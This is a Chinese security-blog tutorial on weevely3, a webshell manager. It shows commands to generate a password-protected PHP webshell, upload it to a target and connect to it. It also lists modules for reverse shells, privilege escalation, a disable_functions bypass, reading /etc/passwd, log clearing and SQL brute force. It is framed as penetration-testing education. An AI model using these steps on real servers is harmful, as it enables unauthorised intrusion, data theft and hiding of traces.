Kali系列 -- linux菜刀(weevely3)

admin 2022年5月25日10:30:04安全文章 安全工具评论44 views2044字阅读6分48秒阅读模式

简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为中心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,端口扫描以目标为中心,挂载远程文件系统,以目标为中心的Bruteforce SQL帐户。



一、下载地址(软件作者)

https://github.com/epinna/weevely3


二、安装使用

1、下载到本地

git clone https://github.com/epinna/weevely3.git

2、进入到weebely3目录

cd weebely3

3、安装需要的模块

pip3 install -r requirements.txt

4、启动weevely.py

./weevely.py

Kali系列 -- linux菜刀(weevely3)

5、生成木马文件,在weebely3文件夹中会生成一个连接密码为123的shell.php

./weevely.py generate 123 shell.php

Kali系列 -- linux菜刀(weevely3)

Kali系列 -- linux菜刀(weevely3)

6、上传shell文件到目标服务器

7、连接木马

./weevely.py http://192.168.139.129:81/shell.php 123

Kali系列 -- linux菜刀(weevely3)

8、获取文件目录,dir

Kali系列 -- linux菜刀(weevely3)

9、利用模块收集信息

WIN-5FMG87H62FN:C:phpstudy_proWWW $ :system_info -info uname

Kali系列 -- linux菜刀(weevely3)

10、直接输入help,查看其它可利用模块

Kali系列 -- linux菜刀(weevely3)

:shell_su                     通过更变使用者来执行shell命令,可以获得root权限来执行命令.                                            :shell_sh                     执行 shell 命令.                                              :shell_php                    执行 PHP 命令.                                                :system_extensions            收集PHP和webserver扩展列表                           :system_info                  收集系统信息                                          :system_procs                 列出正在运行的进程                                              :audit_disablefunctionbypass  使用mod_cgi和.htaccess绕过系统禁用函数的限制。它会上传.htaccess和CGI脚本,并在远程服务器上运行伪系统shell     :audit_etcpasswd              查看/etc/passwd文件                           :audit_suidsgid               查找带有SUID或SGID标志的文件。:audit_phpconf                查看php配置信息                                             :audit_filesystem             审核文件系统的弱权限。枚举各种系统目录并寻找可读写执行的目录,模块仅默认搜索部分linux下的常见目录,logs、root、home等                         :backdoor_reversetcp          执行反向TCP shell. 需要nc -lvp <port>监听                                        :backdoor_tcp                 在TCP端口上生成shell                                         :net_scan                     TCP端口扫描.                                                       :net_mail                     发送邮件.                                                           :net_ifconfig                 获取网络接口地址.                                    :net_curl                     执行类似curl的HTTP请求.                                    :net_proxy                    运行本地代理以通过目标转移HTTP / HTTPS浏览:net_phpproxy                 在目标上安装PHP代理.                                     :bruteforce_sql               可用来猜解数据库密码.                                             :file_find                    查找具有给定名称和属性的文件.                          :file_download                从远程文件系统下载文件.                                :file_check                   获取文件的属性和权限.                            :file_touch                   更改文件时间戳.                                               :file_cd                      更改当前工作目录.                                    :file_grep                    打印与多个文件中的模式匹配的行.                    :file_gzip                    压缩或解压gzip文件.                                       :file_tar                     压缩或解压tar文件.                                     :file_enum                    检查路径列表的存在和权限:file_bzip2                   压缩或解压bzip2文件.                                      :file_mount                   使用HTTPfs挂载远程文件系统.                                :file_clearlog                从文件中删除字符串.                                           :file_zip                     压缩或解压zip文件.                                        :file_cp                      复制单个文件.                                                    :file_upload2web              自动将文件上传到Web文件夹并获取相应的URL.:file_edit                    在本地编辑器上编辑远程文件.                                  :file_read                    从远程文件系统中读取远程文件.                         :file_webdownload             指定URL下载文件.                                                     :file_upload                  文件上载到远程文件系统.                                    :file_ls                      列出目录内容.                                              :file_rm                      删除远程文件.                                                  :sql_dump                     Multi dbms mysqldump replacement.                                    :sql_console                  执行SQL查询或运行sql控制台.


Kali系列 -- linux菜刀(weevely3)


Kali系列 -- linux菜刀(weevely3)

推荐阅读   


【入门教程】常见的Web漏洞--XSS

【入门教程】常见的Web漏洞--SQL注入

sql注入--入门到进阶

短信验证码安全常见逻辑漏洞

最全常见Web安全漏洞总结及推荐解决方案

常见的Web应用的漏洞总结(原理、危害、防御)

代码审计常见漏洞总结

Web安全漏洞的靶场演示

13 款 Linux 比较实用的工具

xss攻击、绕过最全总结


Kali系列 -- linux菜刀(weevely3)

   学习更多技术,关注我:   


觉得文章不错给点个‘再看’吧

原文始发于微信公众号(编码安全研究):Kali系列 -- linux菜刀(weevely3)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月25日10:30:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Kali系列 -- linux菜刀(weevely3) http://cn-sec.com/archives/1047655.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: